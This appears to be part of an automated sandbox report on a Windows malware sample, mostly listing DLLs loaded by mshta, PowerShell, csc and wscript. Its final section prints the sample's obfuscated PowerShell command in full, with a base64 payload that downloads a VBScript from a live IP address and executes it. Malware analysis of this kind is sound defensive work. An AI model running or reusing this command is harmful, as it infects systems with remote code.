                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.2066570021.0000000007330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2069177049.0000000007A7A000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000007.00000002.2066570021.0000000007330000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: $dq7C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.pdb source: powershell.exe, 00000003.00000002.1813925745.000000000502D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1812401473.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.2066570021.0000000007330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2069177049.0000000007A7A000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.2069177049.0000000007A7A000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  PowerShell case anomaly found
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
